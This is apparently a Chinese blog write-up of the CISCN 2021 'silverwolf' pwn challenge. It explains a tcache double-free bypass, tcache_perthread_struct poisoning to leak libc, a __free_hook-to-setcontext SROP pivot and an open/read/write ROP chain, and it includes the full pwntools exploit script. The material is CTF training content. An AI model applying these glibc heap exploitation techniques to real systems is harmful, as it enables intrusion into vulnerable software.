2021 ciscn 线上 pwn silverwolf

最新推荐文章于 2024-05-12 22:03:44 发布
最新推荐文章于 2024-05-12 22:03:44 发布
阅读量855 收藏
点赞数 1
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/119544590
版权

在这里插入图片描述
显然是全绿。

add
在这里插入图片描述只能控制一个chunk,size也有限制。

edit
在这里插入图片描述以回车结束。
这里有一个off by null。

show
在这里插入图片描述就输出。

free
在这里插入图片描述
有个uaf。

其实比起lonelywolf来说就是开了个沙箱。

整个看下来,那个index就是那种逗你玩那种。
然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。

那想想怎么来利用那个uaf。
uaf,在得到libc的条件下,我们可以直接攻击free_hook,来getshell。
但问题就是怎么来得到libc的地址。

现在的情况是有输出函数,但是chunk的大小收到了限制。
我们只能去攻击tcache头
也就是
在这里插入图片描述也就是tcache_perthread_struct,我们直接先攻击他,然后对他进行污染,也就是把counts数组中对0x250chunk的count改的比较大,因为tcache头大小就是0x250.
然后直接free掉,就可以泄露libc地址。

那么问题来了,我们还是要去用double free的,因为它只能利用一个chunk。

libc是2.29,我们还要去做一下bypass。

libc2.29是怎样去限制double free的,他会在bk的位置去加一个key值,free的时候如果这个地方是这个值,就会检查链表中是否已经有了这个chunk。这个值是个啥?

在这里插入图片描述
也就是我们的tcache头的内容部分的地址。
我们只要把他改掉就好了,那么我们的思路就非常清晰了。

绕过libc2.29对double free的检查,对tcache头进行污染,然后泄露libc地址,攻击free_hook就可以了。

要注意一个小细节,在我们攻击tcache头的时候,一定要保证链表空空,不然会导致链表中出现tcacahe fd的值,导致一会malloc错误。

在这里插入图片描述按照题目环境2.27,应该是攻击free_hook,把它的值改成set_context+53
但是因为我这里用的是2.29,set_context变成了rdx寻址,所以把free_hook改成这样的一段gadget。

mov rdx, qword ptr [rdi + 8]; 
mov qword ptr [rsp], rax; 
call qword ptr [rdx + 0x20];

然后在要free的 [chunkptr+8]+0x20 的位置填上 setcontext+61。

这个gadget通过

ropper --file libc.so.6 --search “mov rdx”

来找
在这里插入图片描述

原理是
free()的参数是rdi,通过gadget的转换,现在rdx是[rdi+8],我们可以控制这个地址,然后rdx+20的地方开始跑setcontext。然后就可以根据rdx来控制各种寄存器。

setcontext是个啥,大家应该还记得SROP,SROP用来恢复栈环境的时候用的就是setcontext,所以我们可以在写的时候直接用pwntools的模板。

然后我们就布置rop,把rop读到bss上,然后跳过去执行一下就好了。

然后需要找个地方布置srop。
一个chunk最大只有0x78,地方不大够,需要两个。

最后的效果。
free的时候首先跳到gadget。
在这里插入图片描述
然后我的setcontext+53就写在freechunk的前八个字节,通过把free的chunk的+0x8 写成了写着setcontext+53的地方的地址减去0x20,然后就做到跳了过去。

在这里插入图片描述
然后就是一个srop的过程。

然后读入rop,跳过去就行

exp

# -*- coding: utf-8 -*-
from pwn import*

context.log_level = "debug"
context.arch = "amd64"
context.os = "linux"

r = process("./silverwolf")

libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.29-0ubuntu2_amd64/libc.so.6")

def allocate(size):
    r.sendlineafter("Your choice: ", "1")
    r.sendlineafter("Index: ", "0")
    r.sendlineafter("Size: ", str(size))

def edit(content):
    r.sendlineafter("Your choice: ", "2")
    r.sendlineafter("Index: ", "0")
    r.sendlineafter("Content: ", content)

def show():
    r.sendlineafter("Your choice: ", "3")
    r.sendlineafter("Index: ", "0")

def delete():
    r.sendlineafter("Your choice: ", "4")
    r.sendlineafter("Index: ", "0")

for i in range(12):
    allocate(0x10)
allocate(0x50)
for i in range(11):
    allocate(0x60)
for i in range(7):
    allocate(0x70)
#清空tcache bin

allocate(0x78)
delete()
edit('a' * 0x10)
delete()
allocate(0x78) #为了让链表清空,防止一会malloc出错
show()
r.recvuntil("Content: ")
heap_addr = u64(r.recv(6) + '\x00\x00') & 0xfffffffffffff000 - 0x1000
print "heap_addr = " + hex(heap_addr)

edit(p64(heap_addr+0x10))
allocate(0x78)
allocate(0x78)

edit('a' * 64)
delete()

show()
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
setcontext = libc_base + libc.symbols['setcontext']
print "libc_base = " + hex(libc_base)

#-----------------清空unsorted bin------------------
allocate(0x78)
allocate(0x78)
allocate(0x78)
allocate(0x78)
allocate(0x40)

#-------------------堆SROP---------------------------
magic_gadget = libc_base + 0x150550
bss_addr = libc_base + libc.bss()
flag_addr = bss_addr + 0x200

frame = SigreturnFrame()
frame.rsp = bss_addr + 0x8
frame.rdi = 0
frame.rsi = bss_addr
frame.rdx = 0x1000
frame.rip = libc_base + libc.sym['read']

str_frame = str(frame)
print str_frame

pop_rdi = libc_base + 0x26542
pop_rdx_rsi = libc_base + 0x12bdc9
read_addr = libc_base + libc.sym['read']
write_addr = libc_base + libc.sym['write']
open_addr = libc_base + libc.sym['open']
pop_rax = libc_base + 0x47cf8
syscall_addr = libc_base + libc.sym['syscall'] + 23
#这里如果直接用syscall会被前面那一堆乱七八糟把参数改掉,所以要直接用syscall

poc = './flag\x00\x00'

poc += p64(pop_rdi)
poc += p64(bss_addr)
poc += p64(pop_rdx_rsi)
poc += p64(0)
poc += p64(0)
poc += p64(pop_rax)
poc += p64(constants.SYS_open)
poc += p64(syscall_addr)

poc += p64(pop_rdi)
poc += p64(0x3)
poc += p64(pop_rdx_rsi)
poc += p64(0x100)
poc += p64(flag_addr)
poc += p64(read_addr)

poc += p64(pop_rdi)
poc += p64(1)
poc += p64(pop_rdx_rsi)
poc += p64(100)
poc += p64(flag_addr)
poc += p64(write_addr)


allocate(0x58)
delete()
#为一会写frame做准备

allocate(0x78)
delete()
edit(p64(free_hook))
allocate(0x78)
edit(str_frame[0x80:0xf8])
allocate(0x78)
edit(p64(magic_gadget))

allocate(0x58)
edit(p64(setcontext + 53)  + p64(heap_addr + 0x1430) + str_frame[0x30:0x78])
#gdb.attach(r)
#pause()

delete()

r.sendline(poc)

r.interactive()
yongbaoii
关注
专栏目录
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2252
2022 CISCN 初赛pwn的完整wp
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3
arttnba3的博客
05-21 740
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3[GITHUB BLOG ADDR](https://arttnba3.cn/2021/05/15/CTF-0X04-CISCN2021-PRELIMINARY/)0x00.绪论0x01.场景实操 开场卷pwny | Donelonelywolf | Donechannel0x02.场景实操 二阶卷silverwolf | Donegame0x03.场景实操 冲刺卷satool GITHUB BLOG A
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn_2021_pwn_lonelywolf&silverwolf
weixin_49697396的博客
05-18 879
一、lonelywolf 构造double free泄露并打印堆地址,利用堆地址计算tcache_perthread_struct结构体地址 使用double free 攻击tcache_perthread_struct,修改count>7,并使得下一次申请到tcache_perthread_struct位置,并再次留下tcache_perthread_struct地址 利用tcache_perthread_struct的size free后会放入unsorted bin中,可以泄露出libc地
2021 ciscn 线上 pwn pwny
yongbaoii的博客
08-23 314
保护拉满。 两个功能,read write read 202860放了一个随机数。 read把随机数当作文件fd。 write 也是一个read函数,fd是刚刚那个随机数。 但是这里的write显然index可以随便写,就会有个越界。 我们可以把fd文件号改成从文件中读出来的这个数,但是我们想让他为0,但是显然不大行,因为你不知道这个数是多少 当我们两次write的改fd,第一次fd改成一个比较大的数,第二次就会导致读取失败,所以v2的值不会变,利用的是这种巧妙的手法,来让fd等于0. 接下来就是利.
csicn2021 sliverwolf 详细思路和exp
最新发布
z22168的博客
05-12 941
CISCN2021 sliverwolf
ciscn2021 pwn-pwny
z1r0的博客
05-16 433
ciscn2021 pwn-pwny 查看保护 程序初始化的时候fd取的是一个随机数 所以在程序运行的时候直接read的时候会出错,因为找的是无效内存。所我们需要将fd变成0就可以正常使用read这个东西了。 在这里有个很明显的漏洞,没有限制index,所以可以oob利用。 攻击思路:fd变成0才可以正常利用,看一下202060有什么地址可以让oob发挥作用。 fd刚好就在202060这里,所以我们直接利用oob将fd给覆盖成0。 fd为0之后可以正常的读地址了,借助read功能读取libc和pi
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
ciscn_pwn_lonlywolf
Torebtr的博客
05-22 440
ciscn复现 太菜了,比赛的时候啥也不会,还要肝材料,写到两点,网速也差到爆,实在写不下去了,队友去hw了,分区赛也没进,好好复现,争取下次取得好成绩吧。。。。。 文章目录**ciscn复现****pwn**:*ciscn_2021_lonelywolf*函数分析1、allocate**2、edit函数****3、show****4、delete**解题思路:exp: pwnciscn_2021_lonelywolf 函数分析 题目整体来说不难,常规菜单题,然后进行函数分析(函数已重命名)。而且给了l
ciscn2021 pwn-lonelywolf
z1r0的博客
05-19 226
ciscn2021 pwn-lonelywolf 简单题 保护全开 有一个很明显的uaf漏洞 add还限制了大小 攻击思路:利用tcache struct attack来解决这一道题目,申请到tcache struct这里之后有两种方法来得到unsortedbin的块。 第一种是对struct进行绕过并释放,第二种是将申请的堆块伪造成0x91并释放。这里选择第二种。 因为tcache第一个bin满7个接下来就会fastbin或者进入其他的bin。所以我们改里面的0x91对应的counts为7,再利用ua
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1370
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
silverwolf
wuyvle的博客
07-18 1269
这个题和看起来像lonewolf,但有沙盒规则,题目给了flag的位置,很显然是用orw来做题,我们先泄露出libc基值,rop中我们注入gadget来进行栈迁移,我们这里利用利用 setcontext 来控制rsp from pwn import * context.update(terminal=['tmux','splitw','-h']) p=process('./silverwolf') elf=ELF('./libc-2.27.so') def add(idx,size): p.rec
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1174
CISCN2021pwn pwny(数组越界,劫持exit_hook)
CISCN 2018 PWN task_supermarket
Bill
04-29 1632
全国大学生信息安全竞赛-PWN 序言 第一次在大赛中做出PWN题, 心情有点小激动. 程序运行 0. 结构体 struct node{ char name[16]; int price; int size; char* des; }commodity[15]; 1.MENU 1. add a commodity 2. del a...
2019CISCN华南赛区半决赛 pwn
qq_41071646的博客
12-09 857
好久没有练过pwn了,, 感觉自己pwn 都废了,, 近期打算刷一下攻防世界的android 然后 刷刷这个华南赛区的pwn。 如果刷的差不多 打算继续刷buuoj 。暂时把自己会的刷完。。 pwn1 这个题目真的很有意思 感觉出题人费心了 edit 函数已经给限制了 然后show 函数也限制了 edit 函数????️一个 off by null 由于没有开pie un...
2021 ciscn-pwn 初赛
csdn546229768的博客
06-05 572
2021全国大学生信息安全竞赛-pwny_init 分析 mainreadwrite这个程序其实就是两个核心函数,和名字一样,因为操作的fd指针是个随机参数文件,我们通过修改fd指针为0,也就是控制台就可以实现任意读写了,那么程序就简单了很简单我们看这个这里组的偏移是由我们决定的且没有大小限制(是int64类型的变量)。ok看看bss段qword_202060和随机函数的fd指针只相差0x100偏移,那么就可以间接的控制fd为0了,具体利用如下: 这里就可以将fd置为0,我也是gdb调试调试着就发现的,仔细
190727 pwn-ciscn_final_14
热门推荐
whklhhhh的博客
07-27 2万+
搞了快三个小时才出来_(:з」∠)_几乎白给 雷泽太强了! 简单逆向后可以知道 该程序具有注册和登陆功能 注册后会给name赋值为userx,而get_flag的需求为name==adminx passwd成员存储原始密码加盐(随机数)加密后的结果 code成员存储其他成员加盐(随机数)加密后的结果 登录时校验passwd和code Struct: 00000000 User ...
CISCN 2023 初赛 pwn——Shellwego 题解
CoLin的pwn小屋
05-28 1902
CISCN 2023 初赛 pwn Shellwego题解
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值